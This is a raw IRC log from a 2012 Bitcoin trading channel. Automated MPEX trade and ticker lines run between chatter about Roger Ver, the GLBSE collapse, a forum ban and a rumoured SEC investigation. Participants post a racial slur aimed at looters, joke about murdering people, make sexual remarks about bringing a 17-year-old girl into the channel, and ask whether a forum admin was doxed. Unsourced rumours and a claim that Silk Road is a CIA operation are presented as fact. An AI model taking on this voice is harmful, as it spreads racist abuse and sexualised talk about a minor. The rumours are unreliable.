shipped to jale for a year Oct 28 23:22:12 for selling firecrackers Oct 28 23:22:52 i used to shot fuckers in the head and bury them in concrete pillars when i was his age, never was as much as charged. Oct 28 23:22:59 he sells firecrackers, spends a year inside. Oct 28 23:23:03 crazy world. Oct 28 23:23:40 hope the pillars aren't load bearing Oct 28 23:24:16 dub, the master of the double entendre Oct 28 23:32:01 lol...somebody should add that to those porn accusations on btctalk "beware, mpex is owned by assassin and pornstar" Oct 28 23:32:33 i thought the girl was the pornstar Oct 28 23:33:04 she has her share, no? Oct 28 23:33:11 lol Oct 28 23:33:21 meanwhile, get a load of this http://trilema.com/2012/coinurl-a-bitcoin-advertising-service/ Oct 28 23:33:24 and especially the comments. Oct 28 23:36:36 mushroom mushroom Oct 28 23:40:27 my new favorite forum post https://bitcointalk.org/index.php?topic=64962.msg773754#msg773754 Oct 28 23:40:35 mircea_popescu: heh, re rodger ver: i'm one of those peeps who defaults to thinking that his ex-con status was brought about by the gov't interferring with people's right to freely interract with one another Oct 28 23:41:10 dub: awesome Oct 28 23:41:26 smickles i do agree criminal convictions for having sold firecrackers at the age of 20 are a shameful display of statal stupidity. Oct 28 23:42:00 ahaha dub Oct 28 23:42:05 isn't history cute. Oct 28 23:42:17 dub: I wan't to shouth that link from the rooftops Oct 28 23:42:23 *shout Oct 28 23:42:50 [MPEX] [S.MPOE] 25200 @ 0.00045953 = 11.5802 BTC [+] Oct 28 23:42:53 [MPEX] [S.MPOE] 2104 @ 0.00045972 = 0.9673 BTC [+] Oct 28 23:42:54 [MPEX] [S.MPOE] 5000 @ 0.00045994 = 2.2997 BTC [+] Oct 28 23:42:54 it's like... sssspectacular Oct 28 23:42:55 [MPEX] [S.MPOE] 3595 @ 0.00045998 = 1.6536 BTC [+] Oct 28 23:44:28 when cracked does top 10 spectacular btctalk posts, it will be there Oct 28 23:47:58 re:tracking - it surprised me a bit i got much more visitors from reddit than from btctalk.. looks like there's much bigger lurking to BS ratio Oct 28 23:49:34 ;;ticker Oct 28 23:49:35 BTCUSD ticker | Best bid: 10.65998, Best ask: 10.65999, Bid-ask spread: 0.00001, Last trade: 10.65998, 24 hour volume: 18472.24445661, 24 hour low: 10.24998, 24 hour high: 10.69800, 24 hour vwap: 10.47636 Oct 29 00:08:07 [MPEX] [S.MPOE] 46600 @ 0.00045807 = 21.3461 BTC [-] Oct 29 00:08:08 [MPEX] [S.MPOE] 3700 @ 0.00045552 = 1.6854 BTC [-] Oct 29 00:08:28 mircea_popescu: you committed murder? Oct 29 00:09:49 lmao Oct 29 00:10:07 jurov deposit coming in! Oct 29 00:10:56 how long will it take to hit? Oct 29 00:12:12 lemme see Oct 29 00:13:32 also any reason puts are so expensive this month? Oct 29 00:17:34 it's not much Oct 29 00:17:45 but i'm funding from multiple sources over the next few days Oct 29 00:23:32 thepulledstring, you're in Oct 29 00:24:52 if you want to pull doublespend on me, act quickly now ;) Oct 29 00:25:49 act now and receive twice teh bitcoins and for a limited time a ginsu shoe and tomato paring knife Oct 29 00:28:00 not at all jurov Oct 29 00:28:06 lemme know when it clears Oct 29 00:28:12 and I'll make the trades I want Oct 29 00:28:24 I just wanted to get ahead of the calls since mircea_popescu posted the block halve eta Oct 29 00:29:19 any of you guys in NYC? Oct 29 00:29:35 apparently shit is real now, mcdonalds is closed Oct 29 00:30:05 wait what? Oct 29 00:30:27 Islam invasion, First thing to do: CLOSE MCDONALDS Oct 29 00:30:27 hurricane? Oct 29 00:31:01 ya Oct 29 00:31:19 thepulledstring, you CAN trade nao Oct 29 00:31:24 dub: I just pasted that to my hosting providers (based in NYC) lol Oct 29 00:31:29 hilarity insued :P Oct 29 00:31:47 PsychoticBoy: pretty sure mcdonalds is the last thing to close in any eventuality, 'murricans gotta get dat burger Oct 29 00:32:01 lol Oct 29 00:32:06 murican's rule tho Oct 29 00:32:10 Capitalism is awesoe Oct 29 00:32:13 awesome Oct 29 00:32:30 they'll be out with the zombies lined up on mobility scooters for the drivethru Oct 29 00:32:48 thepulledstring: fuck yeah Oct 29 00:33:26 [MPEX] [S.MPOE] 5605 @ 0.00045998 = 2.5782 BTC [+] Oct 29 00:35:01 we should take bets on if asics drop before the reward half or after Oct 29 00:46:36 'merica, fuck yea! TITS and BEER and pussY and TITS! Oct 29 00:47:25 smickles: aren't you american? Oct 29 00:48:04 i try not to define myself by something so base as what somet people call the ground i walk on ;) Oct 29 00:48:46 i originally thought you were of non-american nationality so I guess it works for you lol Oct 29 00:48:56 :D Oct 29 00:49:13 also thanks for the mini margin, helped me practice trading Oct 29 00:49:25 thepulledstring: i still have that btc 'on account' for you Oct 29 00:49:44 :D Oct 29 00:49:52 It'll stay as reserve for now Oct 29 00:50:01 until I can get in touch with my economy advisor Oct 29 00:50:07 np, take as long as you want Oct 29 00:50:23 she's young and is easily wooed by boys (my biggest fear) Oct 29 00:50:25 if i get good at what i'm doing, i'll start giving you a bit of interest Oct 29 00:50:37 :D Oct 29 00:50:41 i love this community Oct 29 00:50:54 im all for closing mcd Oct 29 00:51:41 https://www.youtube.com/watch?v=6TiXUF9xbTo Oct 29 00:51:45 and this isnt a community. there's no girls Oct 29 00:51:57 so there's not what to community. Oct 29 00:58:28 [MPEX] [S.MPOE] 16700 @ 0.00045552 = 7.6072 BTC [-] Oct 29 01:00:45 i can get a girl in here Oct 29 01:00:48 she's 17 Oct 29 01:00:49 but Oct 29 01:00:57 it's still a girl =P Oct 29 01:01:09 we all know how mircea_popescu likes em young Oct 29 01:01:11 not on the internet it isnt Oct 29 01:03:46 mircea_popescu: is your hair gray now Oct 29 01:03:47 ?* Oct 29 01:08:31 just my beard Oct 29 01:08:48 an' i don't like them young, i like em juicy. Oct 29 01:09:16 speaking of which, i'm off to bed. take care all! Oct 29 01:09:31 me too **** BEGIN LOGGING AT Mon Oct 29 08:27:14 2012 Oct 29 08:36:25 [MPEX] [S.MPOE] 18306 @ 0.00045916 = 8.4054 BTC [+] Oct 29 09:02:02 [MPEX] [S.MPOE] 4100 @ 0.0004606 = 1.8885 BTC [+] Oct 29 09:02:04 [MPEX] [S.MPOE] 6651 @ 0.00045916 = 3.0539 BTC [-] Oct 29 09:27:48 [MPEX] [S.MPOE] 36900 @ 0.00045352 = 16.7349 BTC [-] Oct 29 09:27:49 [MPEX] [S.MPOE] 5300 @ 0.00045342 = 2.4031 BTC [-] Oct 29 09:32:29 mircea_popescu: do STAT and STATJSON have independant 'last hour before last stat's? Oct 29 09:32:36 nope Oct 29 09:32:47 kk, thx Oct 29 09:33:07 http://www.reddit.com/r/Bitcoin/comments/129kbw/reddit_kinda_want/ Oct 29 09:33:14 if anyone wants to vote me and piss off reddit :D Oct 29 09:39:31 http://www.reddit.com/r/Bitcoin/new/?sort=rising mircea_popescu you own it Oct 29 09:40:25 hm ? Oct 29 09:43:27 http://trilema.com/2012/since-ive-been-checking-stats-anyway/#comment-90134 lol is that you smickles ? Oct 29 09:45:05 mircea_popescu: it couldn't be :x Oct 29 09:45:26 lol ynot ? Oct 29 09:46:47 no good reason Oct 29 09:47:04 😈 Oct 29 09:48:10 i spoiled an active $500 scam today Oct 29 09:48:11 ;-D Oct 29 09:48:24 s/spoiled/foiled/ Oct 29 09:54:39 wd! Oct 29 09:54:49 http://www.reddit.com/r/Bitcoin/comments/122wqi/gpg_should_be_replaced_with_btc_my_reply_to_gpg/c6t9w62 Oct 29 09:54:57 btw, this seems like quite valuable discussion. Oct 29 09:55:51 [MPEX] [S.MPOE] 9900 @ 0.00045439 = 4.4985 BTC [+] Oct 29 10:00:31 mircea_popescu: you have a reddit account now/?S?S!? Oct 29 10:00:40 yea Oct 29 10:00:44 i just made it! Oct 29 10:02:39 OMG, ! I was your first upvote! Oct 29 10:03:54 >D Oct 29 10:04:00 brff! Oct 29 10:14:42 https://bitcointalk.org/index.php?topic=121031.0 the forum delivers. Oct 29 10:21:01 [MPEX] [S.MPOE] 10500 @ 0.00045342 = 4.7609 BTC [-] Oct 29 10:21:03 [MPEX] [S.MPOE] 34201 @ 0.00045313 = 15.4975 BTC [-] Oct 29 10:21:04 [MPEX] [S.MPOE] 7608 @ 0.0004523 = 3.4411 BTC [-] Oct 29 10:21:05 [MPEX] [S.MPOE] 2591 @ 0.0004522 = 1.1717 BTC [-] Oct 29 10:28:09 [MPEX] [S.MPOE] 6200 @ 0.00045439 = 2.8172 BTC [+] Oct 29 10:28:11 [MPEX] [S.MPOE] 43100 @ 0.00045556 = 19.6346 BTC [+] Oct 29 10:28:12 [MPEX] [S.MPOE] 37300 @ 0.00045601 = 17.0092 BTC [+] Oct 29 10:28:13 [MPEX] [S.MPOE] 22749 @ 0.00045856 = 10.4318 BTC [+] Oct 29 10:28:14 [MPEX] [S.MPOE] 45300 @ 0.00046009 = 20.8421 BTC [+] Oct 29 10:28:15 [MPEX] [S.MPOE] 2127 @ 0.00046084 = 0.9802 BTC [+] Oct 29 10:28:16 [MPEX] [S.MPOE] 50100 @ 0.00046124 = 23.1081 BTC [+] Oct 29 10:28:17 [MPEX] [S.MPOE] 40300 @ 0.00046243 = 18.6359 BTC [+] Oct 29 10:28:18 [MPEX] [S.MPOE] 28800 @ 0.0004629 = 13.3315 BTC [+] Oct 29 10:28:19 [MPEX] [S.MPOE] 25200 @ 0.00046303 = 11.6684 BTC [+] Oct 29 10:28:20 [MPEX] [S.MPOE] 34918 @ 0.0004633 = 16.1775 BTC [+] Oct 29 10:28:21 [MPEX] [S.MPOE] 46000 @ 0.0004633 = 21.3118 BTC [+] Oct 29 10:28:22 [MPEX] [S.MPOE] 44800 @ 0.00046437 = 20.8038 BTC [+] Oct 29 10:28:23 [MPEX] [S.MPOE] 15157 @ 0.00046468 = 7.0432 BTC [+] Oct 29 10:28:24 [MPEX] [S.MPOE] 28488 @ 0.00046593 = 13.2734 BTC [+] Oct 29 10:28:25 [MPEX] [S.MPOE] 2412 @ 0.00046606 = 1.1241 BTC [+] Oct 29 10:28:26 [MPEX] [S.MPOE] 43033 @ 0.0004662 = 20.062 BTC [+] Oct 29 10:28:27 [MPEX] [S.MPOE] 17692 @ 0.00046626 = 8.2491 BTC [+] Oct 29 10:28:28 [MPEX] [S.MPOE] 5821 @ 0.00046633 = 2.7145 BTC [+] Oct 29 10:28:29 [MPEX] [S.MPOE] 39900 @ 0.00046675 = 18.6233 BTC [+] Oct 29 10:28:30 [MPEX] [S.MPOE] 18700 @ 0.00046689 = 8.7308 BTC [+] Oct 29 10:28:31 [MPEX] [S.MPOE] 10100 @ 0.00046932 = 4.7401 BTC [+] Oct 29 10:28:32 [MPEX] [S.MPOE] 36000 @ 0.00046943 = 16.8995 BTC [+] Oct 29 10:28:32 [MPEX] [S.MPOE] 3535 @ 0.00047048 = 1.6631 BTC [+] Oct 29 10:28:33 [MPEX] [S.MPOE] 28300 @ 0.00047115 = 13.3335 BTC [+] Oct 29 10:28:34 [MPEX] [S.MPOE] 3957 @ 0.00047506 = 1.8798 BTC [+] Oct 29 10:28:35 [MPEX] [S.MPOE] 32899 @ 0.00047548 = 15.6428 BTC [+] Oct 29 10:28:36 [MPEX] [S.MPOE] 22721 @ 0.0004757 = 10.8084 BTC [+] Oct 29 10:28:37 [MPEX] [S.MPOE] 39000 @ 0.00047602 = 18.5648 BTC [+] Oct 29 10:28:38 [MPEX] [S.MPOE] 50391 @ 0.00047612 = 23.9922 BTC [+] Oct 29 10:56:04 [MPEX] [S.MPOE] 13000 @ 0.00046205 = 6.0067 BTC [-] Oct 29 10:56:05 [MPEX] [S.MPOE] 2127 @ 0.00046082 = 0.9802 BTC [-] Oct 29 11:14:25 dub: wtf are you blabbering about :) -> "dub | he's always looking for something looser" ??? Oct 29 11:17:46 you seem obsessed with the viscosity of forum participants Oct 29 11:17:57 http://trilema.com/2012/lets-dig-a-little-deeper-into-this-entire-deflation-problem/ Oct 29 11:18:07 ^^ read that Oct 29 11:21:13 [MPEX] [S.MPOE] 12100 @ 0.00046675 = 5.6477 BTC [+] Oct 29 11:23:57 IBM can it be carbon nanotube mining asic tiem? http://bits.blogs.nytimes.com/2012/10/28/i-b-m-reports-nanotube-chip-breakthrough/?smid=pl-share Oct 29 11:27:20 omg nanotube! Oct 29 11:46:27 [MPEX] [S.MPOE] 21000 @ 0.00046082 = 9.6772 BTC [-] Oct 29 11:52:45 [MPEX] [S.MPOE] 51700 @ 0.00046457 = 24.0183 BTC [+] Oct 29 11:52:46 [MPEX] [S.MPOE] 16200 @ 0.00046675 = 7.5614 BTC [+] Oct 29 11:52:47 [MPEX] [S.MPOE] 13300 @ 0.00046791 = 6.2232 BTC [+] Oct 29 11:52:48 [MPEX] [S.MPOE] 36800 @ 0.00046975 = 17.2868 BTC [+] Oct 29 11:52:56 jesus http://www.uscgnews.com/go/doc/4007/1591447/Coast-Guard-responds-to-vessel-in-distress-160-miles-from-hurricane-s-center Oct 29 11:53:55 that sea like that is not a lot of fun I can tell you Oct 29 12:05:51 https://bitcointalk.org/index.php?topic=121093.0 i loled Oct 29 12:08:14 also the sec investigation seems to be more going after glbse asset listers than pirate Oct 29 12:08:20 the investigation startedin paril Oct 29 12:08:26 april Oct 29 12:08:37 before any ppt where on glbse Oct 29 12:08:52 link? Oct 29 12:16:22 no link Oct 29 12:16:49 evidently it just got big when pirate failed and they passed it up to the bigger guy Oct 29 12:16:53 the current guy Oct 29 12:17:16 but the case started out as anti glbse the case is called "bitcoin securities" Oct 29 12:17:50 pirate did not have a security so i thought it was kinda odd the sec was going after him, as all he did was borrow money Oct 29 12:18:11 so the sec might have gone after nefario, maybe that is why he shit himself and closed it down Oct 29 12:19:48 [MPEX] [S.MPOE] 7473 @ 0.00046082 = 3.4437 BTC [-] Oct 29 12:19:50 [MPEX] [S.MPOE] 27200 @ 0.00045916 = 12.4892 BTC [-] Oct 29 12:26:05 Chaaang-Noi: u got banned at bitcointalk? Oct 29 12:26:43 for what Oct 29 12:28:35 "trolling" but it was about glbse stuff and theymos Oct 29 12:28:52 theymos wanted to shut me up, so called me a troll and perma banned me with out warning Oct 29 12:29:39 he said he might un ban me after the glbse stuff is over... he is just getting rid of people with info about him Oct 29 12:33:11 theymos did not like the fact that i told him it was wrong for him to ask people to not send the double payments back to nefario Oct 29 12:33:16 stuff like that, he called "trolling" Oct 29 12:46:02 [MPEX] [S.MPOE] 40400 @ 0.00045574 = 18.4119 BTC [-] Oct 29 13:11:35 [MPEX] [S.MPOE] 10900 @ 0.00045793 = 4.9914 BTC [+] Oct 29 13:24:03 Chaaang-Noi: did theymos ever get doxed? Oct 29 13:27:08 http://www.theymos.com/ Oct 29 13:27:45 i dont know about doxed but people ahve tracked him down Oct 29 13:27:59 like i dont think anyone has a copy of his passport or anything Oct 29 13:28:13 the FBI could get him if they wanted to with no problem Oct 29 13:28:25 fbi does that sort of thing for the sec Oct 29 13:28:50 im not saying the sec will want him but he might be more of a target than pirate Oct 29 13:31:39 FBI probably already has it Oct 29 13:31:46 they probably called MtGox and were like ey Oct 29 13:31:51 you know that business we let you run? Oct 29 13:32:04 we're going to take the millions of dollars away from you Oct 29 13:32:06 and ruin you Oct 29 13:32:11 unless you gve us the info we want Oct 29 13:35:05 they already give that info to the DEA on request Oct 29 13:35:26 i think its why they "randomly" lock accounts and demand aml docs Oct 29 13:36:46 [MPEX] [S.MPOE] 2927 @ 0.00045793 = 1.3404 BTC [+] Oct 29 13:36:47 [MPEX] [S.MPOE] 20000 @ 0.00045892 = 9.1784 BTC [+] Oct 29 14:02:37 [MPEX] [S.MPOE] 13300 @ 0.00045964 = 6.1132 BTC [+] Oct 29 14:28:44 [MPEX] [S.MPOE] 37916 @ 0.00045964 = 17.4277 BTC [+] Oct 29 14:43:44 Chaaang-Noi, check out http://192.168.2.8:8081 would it be any use for people looking for something browser-based they can use to interact with their shareholders? Oct 29 14:43:59 oops wrong URL haha Oct 29 14:44:50 http://wxi2mgugw4732xs7.onion:8081 Oct 29 14:45:40 it is unzip-and-run java app if you use its standlone version which is what I did Oct 29 14:46:28 and has more features than I have had time to explore yet Oct 29 14:53:59 [MPEX] [S.MPOE] 1289 @ 0.00045964 = 0.5925 BTC [+] Oct 29 14:54:01 [MPEX] [S.MPOE] 20611 @ 0.00045955 = 9.4718 BTC [-] Oct 29 14:54:02 [MPEX] [S.MPOE] 28623 @ 0.00045955 = 13.1537 BTC [-] Oct 29 15:12:23 [MPEX] [S.DICE] 10 @ 0.00339944 = 0.034 BTC [+] Oct 29 15:26:12 Chaaang-Noi: so theymos banned you Oct 29 15:26:21 lol days ago Oct 29 15:26:33 o what? Oct 29 15:26:34 maged did not even know for a day Oct 29 15:26:36 urlpls Oct 29 15:26:48 url for a perrma ban? Oct 29 15:26:55 theres not post about it? Oct 29 15:26:59 no* Oct 29 15:27:32 https://bitcointalk.org/index.php?topic=120102.40 mostly trolls and supporting posts have been deleated Oct 29 15:27:34 some of them Oct 29 15:27:46 the posts questioning theymos were deleated, i dont know by whom Oct 29 15:27:54 also https://bitcointalk.org/index.php?topic=121093.0 Oct 29 15:28:25 theymos was upset Oct 29 15:28:35 oh well.. i just pointed out things he did... Oct 29 15:30:36 also despite people saying i was warned i was not Oct 29 15:32:32 that's a pretty pathetic way to get rid of opposition Oct 29 15:35:15 i was not even really opposition Oct 29 15:35:30 i just pointed out that theymos telling people to not send nefario the double payments back was wrong Oct 29 15:35:54 well, I doubt Im ever going to get the shareholder info Oct 29 15:35:59 so /me frowns Oct 29 15:36:00 and that givng theymos a scammers tag for abusing the stock holders in glbse global was wrong cuz they had a vote and nefario won over 50% to ahve it shut down Oct 29 15:36:14 i said nefario was a scammer but for differnt reasons Oct 29 15:36:28 theymos did not like it... Oct 29 15:36:39 also found out some bad news for him and other about the SEC investigation Oct 29 15:36:54 seems the investigation started in april, before the PPTs Oct 29 15:37:04 its called "bitcoin securities" Oct 29 15:37:17 i dont think pirate was their org goal and still might not be Oct 29 15:37:35 glbse, its owers and asset issuers i think are the real targets Oct 29 15:37:40 [MPEX] [S.MPOE] 36100 @ 0.00046203 = 16.6793 BTC [+] Oct 29 15:38:03 theymos as on record as saying he thought it was a ponzi and then asking people to list ppts on glbse makes him open to a lot of shit Oct 29 15:38:14 esp since he was making money off of it Oct 29 15:38:56 i hope the sec does not do anything but i wouldnot be shocked if theymos and all communication from the forum is requested Oct 29 15:39:27 its seems the SEC investigation got much bigger when pirate had his fail and then they moved it up to the big guy now Oct 29 15:39:36 he did not start it, he took over about a month ago Oct 29 15:39:55 well it sucks that we will hardly get the information about stockholders to the companies Oct 29 15:40:19 im starting to think some people might be working with the SEC at this point. theymos might ahve been right about nefario Oct 29 15:40:21 I for example have some ASICMINER shares and I would really like them to release the information that I have it to the company... Oct 29 15:40:40 im pretty sure the SEC has already called in some glbse customers to be on the record Oct 29 15:40:45 Everyone says that Nefario seemed like a cool guy in the London conference Oct 29 15:41:00 I just think that he's scared because of the investigation Oct 29 15:41:04 i think nefario shit himself when he realized that the feds wanted to rape him... Oct 29 15:41:30 exactly Oct 29 15:41:45 and to tell the truth, who wouldn't :) Oct 29 15:41:48 i think he is in "do what ever it takes to not go to jail" mode Oct 29 15:42:00 and that might be work with the sec/fsa/fbi Oct 29 15:42:14 who the fuck knows what they are investigating.. nefario never did aml stuff like he should asve Oct 29 15:42:15 have Oct 29 15:42:35 i wonder if the dea found out silkroad or what not was using it to wash coins. Oct 29 15:42:53 silkroad is a cia op Oct 29 15:43:01 you think? Oct 29 15:43:04 maybe, but i doubt it Oct 29 15:43:15 im sure some of the sellers are govt but i doubt the whole thing is Oct 29 15:43:27 yup, whole thing is Oct 29 15:43:31 i doubt it Oct 29 15:44:43 anyway im not 100% sure on my intel about the sec investigation but i think its right Oct 29 15:45:05 also i do know the sec plans to pass on what they collect to differnt agancies if they find other "crimes" Oct 29 15:46:02 everyone who is an american and gave id to nefario and listed an asset, id get a lawyer... Oct 29 15:52:14 im glad im not :) Oct 29 16:03:00 [MPEX] [S.MPOE] 3821 @ 0.00045955 = 1.7559 BTC [-] Oct 29 16:03:05 maybe you mean FBI op? Oct 29 16:03:25 i had internet fail, who posted what? Oct 29 16:05:56 no one posted anything Oct 29 16:09:57 ok Oct 29 16:22:41 [MPEX] [O.BTCUSD.P100N] 5 @ 0.22915118 = 1.1458 BTC [-] Oct 29 16:47:48 [MPEX] [S.MPOE] 56 @ 0.00045955 = 0.0257 BTC [-] Oct 29 16:47:49 [MPEX] [S.MPOE] 35808 @ 0.00045846 = 16.4165 BTC [-] Oct 29 16:47:50 [MPEX] [S.MPOE] 2400 @ 0.00045767 = 1.0984 BTC [-] Oct 29 17:02:40 I just think that he's scared because of the investigation <<< what investigation ? Oct 29 17:02:54 ;;calc (10 - 9) / 9 Oct 29 17:02:54 0.111111111111 Oct 29 17:02:59 ;;ticker Oct 29 17:03:00 BTCUSD ticker | Best bid: 10.49001, Best ask: 10.50000, Bid-ask spread: 0.00999, Last trade: 10.50000, 24 hour volume: 42463.24041426, 24 hour low: 10.32090, 24 hour high: 10.95000, 24 hour vwap: 10.66583 Oct 29 17:06:50 mircea_popescu: well it has been written time and again that there is some police investigation on GLBSE Oct 29 17:07:09 right. Oct 29 17:07:11 so ? Oct 29 17:07:31 no one really knows what's going on since Nefario supposedly can't give any information about it Oct 29 17:07:51 it's been written time and time again that there is an african ex general guy with millions or w/e Oct 29 17:08:01 so I was saying that he does all this stupid crap because he's scared of the police Oct 29 17:08:04 the SEC investigation is real Oct 29 17:08:14 and GLBSE was the org target Oct 29 17:08:22 you know this how ? Oct 29 17:08:28 SEC Oct 29 17:08:33 they opened the case in april Oct 29 17:08:48 passed it up to the current guy a month or so ago once pirate failed and shit got big Oct 29 17:08:57 again, you know this how ? Oct 29 17:09:21 a bird told me Oct 29 17:09:55 ya well. Oct 29 17:10:01 watch out we have Varis here :D Oct 29 17:13:23 however it should be pretty damn clear to everyone that there is a real SEC investigation Oct 29 17:13:41 some of the details are clouded i will agree but to think there is not a real investigation is silly. Oct 29 17:13:42 [MPEX] [S.MPOE] 14100 @ 0.00045594 = 6.4288 BTC [-] Oct 29 17:13:43 [MPEX] [S.MPOE] 12700 @ 0.00045574 = 5.7879 BTC [-] Oct 29 17:13:44 [MPEX] [S.MPOE] 18600 @ 0.00045563 = 8.4747 BTC [-] Oct 29 17:14:41 last i heard the guy was trying to discern if there's enough material to START an investigation. Oct 29 17:15:00 not clear how that went in the end. Oct 29 17:15:35 The only convincing evidence I've seen is that email from the Mustakis guy saying that he was looking into BS&T. Oct 29 17:15:57 [MPEX] [S.MPOE] 1236 @ 0.00045626 = 0.5639 BTC [+] Oct 29 17:15:58 [MPEX] [S.MPOE] 16000 @ 0.00046203 = 7.3925 BTC [+] Oct 29 17:16:00 [MPEX] [S.MPOE] 8800 @ 0.00046406 = 4.0837 BTC [+] Oct 29 17:16:01 [MPEX] [S.MPOE] 5300 @ 0.00046447 = 2.4617 BTC [+] Oct 29 17:16:02 [MPEX] [S.MPOE] 20400 @ 0.00046813 = 9.5499 BTC [+] Oct 29 17:16:02 [MPEX] [S.MPOE] 14200 @ 0.00046975 = 6.6705 BTC [+] Oct 29 17:16:03 [MPEX] [S.MPOE] 4064 @ 0.00047019 = 1.9109 BTC [+] Oct 29 17:16:07 yea, last month. Oct 29 17:16:16 Or earlier. Oct 29 17:17:41 we have differnt ideas about what an investigation is Oct 29 17:17:51 the first interview they took was in april, or the first one i could track down Oct 29 17:18:00 they have not charged anyone yet Oct 29 17:18:08 they are still collecting data/evidance Oct 29 17:18:12 well I'm just hoping that there will be another assets website soon, because bitcoin world needs a good assets exchange system Oct 29 17:18:22 they might also pass it on to a differnt govt agancy if its not the SEc department Oct 29 17:18:23 listen, these are terms of art. charging belongs in penal proceedings. an investigation is a civil matter. Oct 29 17:18:35 nevertheless, it's formalised. some guy asking questions is not equal to an investigation. Oct 29 17:19:01 veemirc you know glbse was pretty much irrelevant to that topic since about spring. Oct 29 17:19:09 btc assets trade on mpex. Oct 29 17:19:26 well I heard that you have to pay high fees on MPEX Oct 29 17:19:31 yes, you do. Oct 29 17:19:31 well they are collecting data and have been for some time. they ahve also used spphenas to collect testimony... Oct 29 17:19:40 so it's not a website that I would like to join... Oct 29 17:19:40 they are being agressive as well Oct 29 17:19:44 then again, there's coinbr.com, individual brokers etc. Oct 29 17:19:54 They trade among ppl who can deal with mpex. Oct 29 17:20:00 well i thought we were discussing btc and assets, not you. Oct 29 17:20:14 Chaang-Noi who got supoena'd ? Oct 29 17:20:21 that's not good enough, I want to be able to trade myself, like in GLBSE Oct 29 17:20:31 some one i know has claimed they were, and they know of one other Oct 29 17:20:43 im going to guess its related to the peter lambert thing Oct 29 17:20:48 Chaang-Noi kinda weak chain but anyway. Oct 29 17:20:55 yeah Oct 29 17:20:58 i know Oct 29 17:21:10 veemirc what do you mean "trade yourself" Oct 29 17:21:12 iv been asking a lot of people and collecting a lot of evidance about this. something is going on Oct 29 17:21:50 im not saying they will ever make a case but something is going on... Oct 29 17:22:26 well to that degree it's a healthy thing, Oct 29 17:22:40 i don't see why anyone (other than patent scammers, thieves and general scum) need to be much worried. Oct 29 17:23:11 the SEC is wondering if the PPTs were working with pirate and knew about the scam Oct 29 17:23:52 i kinda doubt any of them are but all the PPTs are targets, and so are the glbse owners like theymos who asked people on the forum to make PPTs on GLBSE a company he owened part of Oct 29 17:23:52 validly so. Oct 29 17:24:05 theymos said in public he thought it was a scam but wanted to profit anyway Oct 29 17:24:18 mircea_popescu: i mean I want to login into a website and buy and sell my shares, not do it through a broker Oct 29 17:24:32 veemirc so then give coinbr a look. Oct 29 17:24:42 last i heard that's what it was. Oct 29 17:24:56 i dont know how hard the SEC will look into this but they are Oct 29 17:25:14 Chaang-Noi people were warned back in spring the ppts are bs. Oct 29 17:25:22 but meh, forum people always know better than everyone. Oct 29 17:25:58 well i did not know it was a scam (and still have no proof it was) but thought might as well let people do what they want, esp since theymos asked for it Oct 29 17:26:15 had no idea the sec might have thought it was a crime Oct 29 17:26:40 also about Ver, thats crazy he got 8 months in fed jail for that... 100,000 sold and shipped in the usa and he was the only one jailed Oct 29 17:26:54 https://bitcointalk.org/index.php?topic=119966.msg1300692#msg1300692 Oct 29 17:26:57 this is pretty good Oct 29 17:31:24 I dont want a broker, but thanks anyway Oct 29 17:33:53 so strange. Oct 29 17:34:54 what a tragedy Oct 29 17:35:23 what happened ? Oct 29 17:41:54 [MPEX] [S.MPOE] 24063 @ 0.00045895 = 11.0437 BTC [-] Oct 29 18:07:04 [MPEX] [S.MPOE] 19400 @ 0.00046022 = 8.9283 BTC [+] Oct 29 18:07:06 [MPEX] [S.MPOE] 22200 @ 0.00046236 = 10.2644 BTC [+] Oct 29 18:07:49 pubic hair stuck in mouse optic unit. Oct 29 18:07:53 "how did that get there" Oct 29 18:07:57 haha Oct 29 18:08:14 double-clicking the mouse Oct 29 18:08:20 a lol lol Oct 29 18:08:26 musta picked it off the desk Oct 29 18:08:29 mircea_popescu sup mah nigga Oct 29 18:09:28 do options get cheaper as the expiration date approaches? Oct 29 18:09:29 not much Oct 29 18:09:32 yes Oct 29 18:10:40 i see. that is what futures sre for Oct 29 18:11:29 that = ? Oct 29 18:12:18 oh sorry mumbling to self. i will elaborate when not driving Oct 29 18:16:40 so bro Oct 29 18:17:05 “Bout to do some looting when this hurricane finally hits….gonna get a new laptop and tv…this hurricane might be the best thing to happen.” Oct 29 18:17:10 capitalism meets nigger. Oct 29 18:17:21 dats racist Oct 29 18:17:26 why yes, yes it is. Oct 29 18:17:26 term is negro Oct 29 18:17:27 lol Oct 29 18:17:47 you cray Oct 29 18:18:14 you reading tweets mircea_popescumk Oct 29 18:18:18 you reading tweets mircea_popescu* Oct 29 18:19:08 nah, someone sent me the quote. Oct 29 18:19:25 what kind of futures will you have? Oct 29 18:21:12 how should i know ? Oct 29 18:21:15 eventuyally all of them Oct 29 18:23:35 i wqnt future for november 26 Oct 29 18:23:40 want Oct 29 18:23:48 i kid i kid Oct 29 18:32:50 [MPEX] [S.MPOE] 1200 @ 0.00046384 = 0.5566 BTC [+] Oct 29 18:58:00 [MPEX] [S.MPOE] 8000 @ 0.00046287 = 3.703 BTC [-] Oct 29 18:58:02 [MPEX] [S.MPOE] 19500 @ 0.00046104 = 8.9903 BTC [-] Oct 29 19:24:41 [MPEX] [S.MPOE] 18545 @ 0.00046104 = 8.55 BTC [-] Oct 29 19:24:42 [MPEX] [S.MPOE] 5749 @ 0.00045983 = 2.6436 BTC [-] Oct 29 19:26:42 ;;ticker Oct 29 19:26:43 BTCUSD ticker | Best bid: 10.53001, Best ask: 10.57104, Bid-ask spread: 0.04103, Last trade: 10.53000, 24 hour volume: 43190.10348393, 24 hour low: 10.32090, 24 hour high: 10.95000, 24 hour vwap: 10.66457 Oct 29 19:27:24 ;;ticker Oct 29 19:27:24 BTCUSD ticker | Best bid: 10.53001, Best ask: 10.57104, Bid-ask spread: 0.04103, Last trade: 10.53000, 24 hour volume: 43189.69960579, 24 hour low: 10.32090, 24 hour high: 10.95000, 24 hour vwap: 10.66457 Oct 29 19:27:38 ;;ticker Oct 29 19:27:38 BTCUSD ticker | Best bid: 10.53001, Best ask: 10.57104, Bid-ask spread: 0.04103, Last trade: 10.53000, 24 hour volume: 43189.69960579, 24 hour low: 10.32090, 24 hour high: 10.95000, 24 hour vwap: 10.66457 Oct 29 19:46:49 !ticker s.dice Oct 29 19:46:54 [MPEX:S.DICE] 1day: 0.00339944 / 0.00339944 / 0.00339944 (10 shares, 0.03 BTC), 30day: 0.0001 / 0.00293552 / 0.0034 (1795889 shares, 5,271.88 BTC) Oct 29 19:50:58 [MPEX] [S.MPOE] 13700 @ 0.00045983 = 6.2997 BTC [-] Oct 29 20:16:37 [MPEX] [S.MPOE] 21231 @ 0.00046311 = 9.8323 BTC [+] Oct 29 